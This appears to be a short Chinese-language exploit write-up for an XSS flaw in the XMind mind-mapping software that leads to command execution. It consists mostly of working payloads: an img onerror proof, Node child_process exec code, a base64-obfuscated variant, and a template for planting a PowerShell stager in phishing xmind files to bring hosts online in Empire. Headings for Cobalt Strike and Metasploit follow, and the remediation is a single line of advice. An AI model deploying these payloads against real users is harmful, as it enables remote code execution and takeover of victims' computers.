XMind概述
XMind 是一款非常实用的商业思维导图软件,应用全球最先进的Eclipse RCP 软件架构,全力打造易用、高效的可视化思维软件,强调软件的可扩展、跨平台、稳定性和性能,致力于使用先进的软件技术帮助用户真正意义上提高生产率。
漏洞利用
##证明xss payload
<img src=x onerror=alert(/hack/)>
##代码执行payload
require('child_process').exec('systeminfo',(error, stdout, stderr)=>{
alert(`stdout: ${stdout}`);
});
##利用payload
<img src=x onerror="const exec = require('child_process').exec('systeminfo',(error, stdout, stderr)=>{alert(`stdout: ${stdout}`);});">
##通过对payload base64加密利用
<img src=x onerror='eval(new Buffer(`cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ2lwY29uZmlnIC9hbGwnLChlcnJvciwgc3Rkb3V0LCBzdGRlcnIpPT57CiAgICBhbGVydChgc3Rkb3V0OiAke3N0ZG91dH1gKTsKICB9KTs=`,`base64`).toString())'>
钓鱼上线Empire
###上线payload
<img src=x onerror="const exec = require('child_process').exec('这里powershell脚本',(error, stdout, stderr)=>{alert(`stdout: ${stdout}`);});">
钓鱼上线cs
钓鱼上线MSF
修补建议
不要随意下载陌生xmind文件,不要随意点击文件。
END!!!